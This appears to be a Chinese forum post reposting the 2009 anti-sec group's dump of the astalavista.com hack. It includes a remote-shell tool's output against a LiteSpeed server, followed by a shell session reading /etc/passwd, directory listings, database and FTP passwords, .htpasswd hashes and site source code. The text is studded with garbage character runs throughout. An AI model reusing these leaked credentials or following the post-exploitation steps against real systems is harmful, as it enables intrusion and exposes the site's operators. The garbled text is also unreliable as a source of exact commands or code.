里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。! A5 Z, z. p6 L4 K. g3 E; v3 G
* ~1 `+ Q3 Z" l& \; f8 N[root@front3 ~]# curl -I litespeedtech.com
) ?- ~5 f0 U* t! ]5 zHTTP/1.1 200 OK- t' d1 v$ p5 n8 }( @
Date: Fri, 05 Jun 2009 22:54:51 GMT
, {$ F. h9 B0 o5 j' a ~' K4 x5 ]Server: LiteSpeed
& n2 x% |0 @# U' y6 f8 N1 c+ F G' L* y! W
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-( W9 }1 S! F! N8 |7 v; f# }: [
8 t2 l9 [* [+ r3 H+ f) V1 R
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。$ R5 D" V7 r+ d5 A0 T
6 X1 T# p$ c S; o4 P! N* z0 B0 S
7 `2 b4 V7 |' B0 N1 e/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ 4 O0 ~8 G0 Z4 h$ y3 \: c5 |3 [
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \2 B+ b( E/ h$ {& v( Z7 {
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \( T- b" M, m0 k3 A& @
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /4 ]6 ?; f) d- @, E, }9 a% ^
\/ \/ \/ \/ \/ \/ \/% J j7 Q4 u. Y4 J# t
The Hacking & Security Community
0 O5 r+ {/ W) ~: Z5 i/ _% @[+] Founded in 1997 by a hacker computer enthusiast
" r9 y: {+ |: E6 f[-] Exposed in 2009 by anti-sec group: \3 O X3 z# ?/ X5 D
7 z6 H3 f: m( q% V# i( }From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:8 i. I: G) U5 H! P: O" o
>> 03. Who’s behind the site?
6 k2 I0 r d9 v1 Q+ U8 i>>
$ d8 z2 G, W6 t# P>> A team of security and IT professionals, and a countless number of contributors from all over the world.0 e4 R5 |6 a" {% W
) C* i/ n/ ]9 O7 {* U$ g: [+ z
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?1 x2 L& X% a' y
>>
' Y/ a6 Z# I$ [* S, s% T8 s>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
3 R6 A% X) k1 A, K4 q8 F; \military institutions.- z3 S D- ~& t5 }# q
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
8 H! g6 d3 g- [4 n; a0 C4 P) u9 Q# `4 H4 K& Q- F5 s, G
Why has Astalavista been targeted? N6 |' A: w" |1 F+ ~3 k, K
! y; G" r! l, M9 V
Other than the fact that they are not doing any of this for the “community” but
# D% T0 W; }" m5 Z! i& ofor the money, they spread exploits for kids, claim to be a security community
. u5 U4 ~8 G9 P+ a* N1 H' P(with no real sense of security on their own servers), and they charge you $6.664 g; p- Z- e8 p+ r' M3 h
per months to access a dead forum with a directory filled with public releases6 W# n1 E$ i6 g: K
and outdated / broken services.
# G1 z! F6 ^; ?4 W: C' J- q5 }0 D0 {9 a+ }/ A
We wanted to see how good that “team of security and IT professionals” really is.* v/ y9 g' c- U1 u: n( y# h
* @6 ?3 b: P, ` M. S6 S$ cLet’s begin.) C/ e: X* Q0 A# l' Y) ?9 D$ L
: }, A* p4 \5 t1 }' m
anti-sec:~# ./g0tshell astalavista.com -p 80 U" _. |6 t$ H, J" J/ k) {3 r! ]
[+] Connecting to astalavista.com:80) W: `# y+ y* J4 u: x" e6 ^
[+] Grabbing banner…7 }! R$ W$ Y; i1 F7 r
LiteSpeed5 D/ J- M! O) ^! e m! X4 B& ^
[+] Injecting shellcode…) q5 t$ P0 \* m& B p6 T
[-] Wait for it
+ @0 K3 x# M2 ^! a9 ~% S$ ^- p. I+ Z2 E+ T/ j
[~] We g0tshell
& A+ H" `- n9 y, A6 `uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
! Q! c, f$ N! ^ID: uid=100(apache) gid=500(apache) groups=500(apache)
( t& H" F2 _9 e: N8 I) s4 M) ]7 M( v' p- ^6 k) p+ l
sh-3.2$ cat /etc/passwd
5 k" h1 _9 Y' _) M6 Z$ Iroot:x:0:0:root:/root:/bin/bash
3 Y3 `! U% i/ v* y" ^bin:x:1:1:bin:/bin:/sbin/nologin- R" M6 D/ A6 z, @
daemon:x:2:2:daemon:/sbin:/sbin/nologin
8 d. G" \& s; X5 G3 d; Padm:x:3:4:adm:/var/adm:/sbin/nologin
7 v( t( `5 X) x; Ylp:x:4:7:lp:/var/spool/lpd:/sbin/nologin& t4 |9 J+ A& ]2 k
sync:x:5:0:sync:/sbin:/bin/sync S& Z0 ^/ M0 p% z% p7 v% D `
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
% ^* q1 `7 _4 |' R4 A8 qhalt:x:7:0:halt:/sbin:/sbin/halt. P& a+ s* g' Q
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
& a+ }% ], K" O/ T5 y% [8 g( xnews:x:9:13:news:/etc/news:
) A. b" V$ C, p# J# d8 @: l6 D1 B6 zuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin8 R) r8 T" i e& T [
operator:x:11:0 perator:/root:/sbin/nologin
2 Y8 A& W- J9 q9 U( f, Zgames:x:12:100:games:/usr/games:/sbin/nologin
0 ], W2 ]. {; \& ?5 n9 Wgopher:x:13:30:gopher:/var/gopher:/sbin/nologin* w" N. b$ B2 S8 }- ?$ m( i& H
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin% y! N, P! |1 I& I V7 a
nobody:x:99:99:Nobody:/:/sbin/nologin
/ P& y* Z8 e0 u9 ~4 ^4 [' Y0 `& _0 Jrpm:x:37:37::/var/lib/rpm:/sbin/nologin# m( d. p$ C+ q" d! y
dbus:x:81:81:System message bus:/:/sbin/nologin0 c* ~5 v% @- e% N
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
0 v# M9 B z- f1 t' r9 ?5 R- Nmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
1 n' a& ]+ s! Z4 V4 Tsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin+ b6 p1 W5 C) B
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
, q$ M5 I5 ~) khaldaemon:x:68:68:HAL daemon:/:/sbin/nologin8 F2 G% m4 u, W6 b5 ~! P
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin7 R. B/ v1 v2 R+ Z: i1 |; f7 ] j
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin: S6 ^# B% a) |: x
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin3 o/ K G+ f( P! v3 V
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
]% O4 P8 P' Epcap:x:77:77::/var/arpwatch:/sbin/nologin( C: P8 E6 y4 @3 S# \" C
named:x:25:25:Named:/var/named:/sbin/nologin& z- [2 F2 j, V6 ]& q" p
apache:x:100:500::/var/www:/bin/false
$ f. Z; W8 l5 s8 N$ w, {diradmin:x:101:101::/usr/local/directadmin:/bin/bash
+ N* _( A9 G; K2 V2 J) l- omysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash: N& h( ?8 B! i8 F3 m0 ~$ a
webapps:x:500:501::/var/www/html:/bin/bash
" B0 d$ t! y$ Qmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash3 k( ?8 N* W$ d! w, f( e
admin:x:501:502::/home/admin:/bin/bash9 U! P' ~4 Y" l7 F1 U
jon:x:502:503::/home/jon:/bin/bash
. g% O7 ^, ~; U3 }, }com:x:503:504::/home/com:/bin/bash
/ l0 Q$ \0 Z$ I tntp:x:38:38::/etc/ntp:/sbin/nologin# w' ~! A" F; J' m3 q" l
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin7 v, W6 \8 o% X5 V3 w. ?2 F l8 l% i. j
astanet:x:504:505::/home/astanet:/bin/bash
: F9 B1 x9 R, u# Z* K2 gavahi:x:70:70:Avahi daemon:/:/sbin/nologin, ^- P( H( k7 o# ?9 h7 q
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
3 i3 s% b" v: _* ~5 ?# c" n
6 Q7 ]" F b- G" n* I1 N; Tsh-3.2$ cat /etc/hosts
# |" M# D% b) M# Do not remove the following line, or various programs( t2 R# ~2 o4 R& W f* l' d
# that require network functionality will fail.$ ^0 g, I8 ?5 @# }; A; j
127.0.0.1 localhost.localdomain localhost0 T+ \3 X' ~, u2 ^/ Y( N
::1 localhost6.localdomain6 localhost6
/ j( G" N) K& i0 W* t" y# T. W80.74.154.172 asta1.astalavistaserver.com
; u5 p. J( `& a3 N& M) w% l5 s* k
sh-3.2$ pwd% @: {9 O, _) J; y2 P9 v
/home/com/public_html) T# w. }9 W2 Z
% R0 [3 _* T: U( }
sh-3.2$ ls -la3 J6 H2 x ?1 e. D$ ^6 P
total 18460) j. l" r: A3 ]. r, T j
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
+ V+ u5 S' j# m' L% m# y+ @drwx–x–x 11 com com 4096 Jun 25 2008 ..
+ i; [; o& S0 R7 O7 l0 H8 ydrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin( o# ~7 K$ E/ b. z" D1 {3 a
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache9 B- r9 Y4 A# w! k
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin6 h2 H. S6 n4 b4 o" F/ p8 a/ D
drwxrwxrwx 2 com com 4096 May 19 00:50 config& ?' M- v4 G; J4 V8 X+ B- e
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
* i+ r% Z; C; [; \" ?3 udrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
4 g6 H( h) [. a ? r, W Ldrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
- G2 a( e% Q- v6 V1 d( ], g7 I0 O, S( Jdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo2 U/ h! [- m6 j/ L8 u% z
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
9 z$ ^. B9 i/ B R" e% g-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php8 s" H# E2 M4 K, A+ q
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
1 k7 N4 x6 a4 I: wdrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor$ V3 D* {( Q9 C
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico1 {, y2 Z% d! `4 O6 I: N
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
6 X& ^0 _9 u2 k-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
/ V0 @* A- R' L. @-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
, h r0 L0 o. Y7 |& ]: U( {- H-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak4 }6 g* y: _- H
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
q. u" q6 C @9 c5 Y; D8 `; P& pdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images
3 Z; f2 y6 T/ n0 G; n0 A-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
: B6 G; Q- ~# ~; Jdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
% R9 N1 D- c( mdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
1 Z: e p( H1 W0 Kdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
# a7 P! l; I0 y% G9 W& T( Odrwxrwxrwx 12 com com 4096 Jun 2 07:47 media. I$ c2 t3 S9 ~! |
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
0 l I% j$ [' [+ o% z3 ^drwxr-xr-x 34 com com 4096 May 28 16:30 modules
+ t. g, z- c; p: sdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin- J9 p: U- |3 q: \/ F, \# q8 l
drwxrwxr-x 22 com com 4096 May 28 17:06 _new2 s) {# K* g0 n( g* I6 J v# B- @
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
" S" }% @) ?0 {# C1 m" X" qdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy3 T9 \# Y6 s8 Z+ |6 N3 g
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
. t9 L5 M/ W" w-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt- K( ]+ ~% H) j' ?
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml- D2 }) ^3 s0 |$ Z
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
5 l- L9 J5 @3 I3 pdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
4 o( q3 N9 ~" `! Ddrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp# |( M) {" C+ j, h x- }& `
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
. t% k. t f6 j( B" |: Y+ U2 P2 Z7 y6 X6 [( H
sh-3.2$ head -20 index.php5 }* k' \" h2 \
<?php4 ]0 b0 \8 D) l4 B0 u1 H# g% [
. ]" X+ q Z2 s- D
/**0 M e7 @$ }8 `
* The main page for the CMS
: Y' [: ^% D" s# t0 |6 b( R* @copyright CONTREXX CMS - COMVATION AG
& k q/ s. Z& ]( M9 p* @author Comvation Development Team
8 E' }6 b# G4 [6 P' l* @version v1.0.9.10.1 stable
6 j. V2 E5 L+ ]. P1 ]* @package contrexx
) |: J( [& B8 ?9 m4 p7 h. T* @subpackage core
( D9 Y. c7 F+ M# ^1 [* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
! M, o# G$ V' R2 m: N; @5 f# i: b* @since v0.0.0.0* I" h P1 R8 _- W' u) q. V3 B
* @todo Capitalize all class names in project
5 a$ s. Q: L1 ^6 b5 z* S% n* @uses /config/configuration.php
0 } ^- E1 G8 V1 A' M* @uses /config/settings.php* b0 f. S, V) G( ~! m# s' O4 I0 }
* @uses /config/version.php
9 Z8 c+ p0 ?; G3 q+ S5 v* @uses /core/API.php& @0 {7 b- G; E6 R
* @uses /core_modules/cache/index.class.php. {" V9 w2 }% j, p; J' \
* @uses /core/error.class.php; J p1 v# ?% ?4 c5 E+ g
* @uses /core_modules/banner/index.class.php
/ [) V% ^8 S' v! x& L; |* @uses /core_modules/contact/index.class.php
: A. V# P; V) e& s: ]: E! h" k" d& g% {
sh-3.2$ cd config/* G& C3 K! u8 P1 C
sh-3.2$ ls -la$ J- s( K% r. f- m& H, E
total 32
/ O" S1 @9 K* q* r+ Z7 W0 ndrwxrwxrwx 2 com com 4096 May 19 00:50 .- Z) C" Z" @8 }
drwxr-xr-x 30 com apache 4096 May 28 17:06 .." Y2 Q% J. t4 h$ ?/ ]+ U2 n R5 m
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
! F% r' S2 ]4 j& P-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
# r4 ~) g4 t4 h6 w% g& Q-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
- ?4 `! Y: U1 Z; I/ a/ N-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php3 c2 a" @0 _/ L) Y8 b$ o
, T8 Y3 K# m: ?5 P1 @5 ?
sh-3.2$ cat configuration.php. a) `2 b1 a1 x8 e
[snip]: y* M0 ~8 L" s# p6 r
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost$ o9 w1 B$ i8 j! s; G
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name) g" r4 j6 K! @. s' k' o
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix8 Q! p7 v+ t g( O$ ^' |
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username a: E" u6 {3 l7 X
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password6 W) {* A, r9 c* g+ k1 @/ ]; Q1 ]
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
1 B/ U- o1 \. R& g' t; Y5 h$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)8 x3 O8 {0 O- A- N; {
[snip]* ~1 ]; A6 H }3 x( T: N
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false2 I6 L5 o- P; k3 M l1 i; V
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
8 @! u9 p9 z2 d$ M3 K$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
& R: B k, w6 ?! Z$_FTPCONFIG['port'] = 21; // Ftp remote port
$ v* @ d) Y; q4 R1 U6 D- C8 u, |0 V$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
& z- o7 w5 q. ~* l" Y. J$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
. E3 T4 }' r; M: A& i! p$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
4 }8 B! ]; a2 T) ~3 E Q8 z
) S: n/ \8 M6 D+ N/ @sh-3.2$ cd ..
) r) H% A9 w4 b7 \& r3 h% R9 O' X, Ash-3.2$ cd dvd/ S" x. l1 Z) i2 G" a" e7 Q: _
sh-3.2$ ls -la. S/ ] X, o0 P9 E. O/ j
total 29137801 B* w* H" c: C7 ^7 \0 p
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
8 ]% ?) [+ l! _6 Gdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
! A A* a7 F; p: X5 |-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar" h, ?$ n# B4 t+ V& Y0 _, l. Q
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
. V; Y3 j! ~$ @% f2 F- s-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
# y2 }, W1 _1 U5 m3 D& l, x$ i- D2 S-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess6 p) ~% S# N0 h& D
$ f$ m# v/ H4 u! d8 G k' Y" p
sh-3.2$ cat .htaccess! t* \" r* K5 Z2 p6 T! K! l
authType Basic
0 {! W! ^4 y/ ?1 e. |$ E( a$ e# cauthName DVD) A/ ]% L3 W# b8 ?) j6 Y' M
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
1 o& p4 n+ f, D0 L( A/ d3 Zrequire valid-user( t: |* N% P% f8 ^" I( u# q
# ^8 l g' P( E8 i5 o7 Xsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
/ k5 d8 C" `. PDVDdownload:CRD8cuY6.MPT6% {+ @$ b( W- O& m: l' k. z
DVDdownload2:CR8a36.wluFMg8 V4 s' O- l0 r; _: P1 V0 x( ?
$ M% c& l! W" n
sh-3.2$ cat test.php5 m: J) W# e f" z+ C
<?php
: |9 h- Z+ u6 s/ b1 b+ S$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;- M) r5 B$ A" f0 F; s- m
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
2 `( d+ ^6 c7 I9 Y" I0 Necho $url;
9 S8 g% x9 y/ K?>
- v. J" {! H3 K/ E0 H G% g G! N( t9 s5 _6 a- f
sh-3.2$ cd modifications/
5 z: T1 m6 ~# ^& J; }7 ^$ `1 esh-3.2$ ls -la0 O- k$ ]: Q. z
total 32 k/ W! H5 w: m- H$ C* x: V
drwxr-xr-x 8 com com 4096 May 11 12:48 .7 [$ o p8 R( _2 P: S9 M9 u0 g5 K
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
; @% W/ O4 V. d0 b9 i% |3 p8 Hdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
: d4 P$ a5 k. w* z( v' idrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs6 j3 @7 c5 @# s" b& W2 M6 J
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools4 @: l4 c! N- v: G& y
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc& k7 t/ M3 E- s4 c% [7 {
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search# l8 ^ o! R0 a; H8 O/ f5 p
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
/ Z9 l7 I7 y$ o
; A& w2 f: s* I- }( m5 u) x$ `3 K8 Ash-3.2$ ls -R/ w+ U1 S/ G- e$ h9 e
.:
/ f$ ~3 u8 q" l4 R# tcom_avtng cronjobs onlinetools pjirc search _tmp
: R' ]2 H# v. w( M& q0 I8 h
$ r- X2 E: J1 N! R; [/ Z6 h9 h./com_avtng:1 `& x, T a8 d9 p
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
4 V- C$ c% V/ d) r2 D1 \2 ^- V+ f( |, O% \* x
./com_avtng/scripts:
; W. W7 { ~# P& j/ ypopunder.js& F8 ~. b p) g+ W" N
/ g( L0 G, t9 ?$ S- }./cronjobs: { Y2 h' q* \: `; ~* c4 t
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
) P$ u( B; L3 ~/ b$ x( n& Q
$ f7 F, C9 {/ t6 P* ?+ O0 e+ D./cronjobs/tmp:8 j4 E9 G2 K1 U: G
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv9 }1 Y; Y( L" f8 E; [$ U
/ B1 I% e2 r5 V0 i
./onlinetools:
7 G. j5 J, ` U( K6 i* gindex.php
- c" j% Q c- ~
% F( Y! U( ~# S3 V+ p% G./pjirc:5 `# {7 l) L, ]/ O+ [6 P
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt) Q1 }) j7 H0 V0 s
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt8 D; @ G. P8 `5 T% N! Y7 `
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd8 E. f. `9 r* |" S! v
' m( e! X7 C7 e7 Z6 L) b5 M./pjirc/img:
$ {1 d# y8 {' M Mange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
, ]2 e4 L/ ~# B9 N' Q5 w+ \arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
) m8 j$ P, @% q) {verre-eau.gif
) f, Q% ?! D& B& U margh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif 6 C3 Y6 P& P, s% V
verre-vin.gif
% T4 Y; B. E) p4 u1 G. Nballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif9 V5 \/ g3 ?0 q) O9 j* n' j0 d
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
. w" Z3 m/ ^# Q) W: n1 ~7 Q7 H; V; F7 Q" K1 P
./pjirc/snd:9 f" a2 D3 V0 q7 v5 M3 _ R
bell2.au ding.au' w, W- b0 s$ m* N
2 }/ s% }. h$ N, r./search:4 G9 b, u4 O7 m( g3 H* z3 W
searchEngines.php search.php
7 b& Z/ k, b3 ~7 h) X$ n9 h. a$ v# _
./_tmp:
1 p+ @9 [; }- n, M+ M& LdefaultPorts.php defaultPorts.txt
7 @' |+ E, ^6 K! r, r: X: a# s) i6 ~+ a1 [' _8 u
sh-3.2$ cd cronjobs/
4 u& T/ H" r. y- Ysh-3.2$ cat exploits.php
+ |# O/ U: Y7 E$ W[snip]
7 p" j$ x3 `7 U9 @4 e$ G, t$categories = array();
: W/ B0 a1 s. T/ u3 x' Q$ ]$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
+ s; }8 W! t8 v4 O5 v' l2 r$expolits = file($milw0rmFile);
+ C! k# U& g; z( A& L$comExploits = array();5 o* Z. J: V2 L. k% h, d+ |
[snip]
) s+ j/ u/ \! A8 C1 i// manage data7 K* i! W8 p. Y- V: H
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
& V4 W( S2 ?* _' x
' S2 P1 l1 z, t7 N // get path and title c' s# r; w& l
$expolits[$x] = trim($expolits[$x]);, {+ h& k" ]( i: }
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
- Z! r+ j) x) i+ y7 I$ E$ c0 s $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
, G$ O6 ?8 ]! F' c$ W0 W8 Z: y5 q I3 [* Z( o# {7 w* ~
// check if file exists
/ i2 d$ o8 W' ~6 W2 d9 k. a if (file_exists($path)) {
* V# s* a8 k- s: I
% R& D t/ H7 S9 b( S& B $text = file_get_contents($path);" w7 M, H! {! [: M' Z) l) ~+ d3 s, S
5 K9 p0 g2 v) {1 _ // get content and date `0 G+ Z% L( W. n
//$text = htmlspecialchars($text, ENT_QUOTES);6 o+ T7 L0 f- c1 i( X( V
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));( [& Y! D! C6 I0 ]- h
if ($tmptext != ”) {8 z" a, h# }8 s, W7 G
$text = $tmptext;
5 L5 {% p) y7 P ^4 i. o } else {
5 Q( b, k p- t# l1 }8 F $text = addslashes(htmlentities($text, ENT_QUOTES));3 s4 i3 p- g$ W0 ^1 \
}3 I R0 E' ?3 u q" m
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
; C6 k# q2 A& @3 R $tmp = explode('-', $date);% M: X1 x: a9 @/ M( ~4 _
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));! F: g3 a/ {7 I% p H" ~9 \$ F2 E
$cat = getCategory ($path);
. N8 p5 v0 f+ E+ n $ext = pathinfo(basename($path));8 Z; p. }6 q" Z1 V7 S
$ext = $ext['extension'];
9 q" g( G4 N( c' ~! w$ ^ $qStr = ”3 H- k" Y$ a: v: Y: @+ H& v
SELECT `id`
! M; I; ~' s/ } c5 [0 t3 p FROM `contrexx_module_exploits`
' j5 c" \8 K3 w& g. a' q/ D) z4 s WHERE `title` = ‘” . $title . “‘. J# B( ]* K) O: u( @0 {5 ]9 ?
AND `date` = ‘” . $date . “‘
8 s+ Y" ~5 |% y6 U “;; z0 P' T9 [; [4 i0 D3 a
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;% L$ y2 u, T$ a* C/ }
$q = $_objDB->query($qStr);
7 [2 ~$ M( y" c. l2 A2 b; ]4 T$ F, `9 c9 `) {( V
if ($q->numRows() == 0) {
7 {$ U) [$ t' a9 S r3 u! f6 b! w! H r/ U5 B. C+ p+ c8 C3 J, q
// prepare array! X& ? n. c7 [+ V/ {+ `; K! N
$comExploits[$x]['date'] = $date;: t. H5 H- q/ J& F3 Q
$comExploits[$x]['title'] = $title;6 [/ a( v' l# T/ |5 s
$comExploits[$x]['author'] = ‘milw0rm’;
( U: v. r+ t. y2 H; ^ f+ z $comExploits[$x]['text'] = $text;
( j/ o. U. j. H9 E% x $comExploits[$x]['source'] = $ext;
8 ?' K; o; B" M# o( q, x' i0 e+ v$ r $comExploits[$x]['url1'] = ”;$ Y& }& n6 N. B: C* n
$comExploits[$x]['url2'] = ”;
: o1 b/ r% @" o: P% n+ h $comExploits[$x]['catid'] = $cat;
% W4 B6 y; x' B9 A* y $comExploits[$x]['lang'] = ‘2′;
k0 d! }% k/ c3 p, r/ D $comExploits[$x]['userid'] = ‘12′;/ k; m7 x: X# y/ `. f
$comExploits[$x]['startdate'] = ‘0000-00-00′;# }2 f% A" _5 [. M8 W) {9 e" o5 C
$comExploits[$x]['enddate'] = ‘0000-00-00′;7 L6 @; q" h7 S: m! R
$comExploits[$x]['status'] = ‘1′;
% h1 T2 `5 p/ }: U9 P, p $comExploits[$x]['changelog'] = $date;
% b' a& q* L% `; T" r9 V4 o3 i1 T/ o. @+ e& d; }
}
1 C9 |, M9 \! r! K[snip]
7 X X' @+ V2 B' @- E1 I+ u; Z1 b $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>. ]$ I) ?; W g% I! u, Y
<rss version=”2.0″>
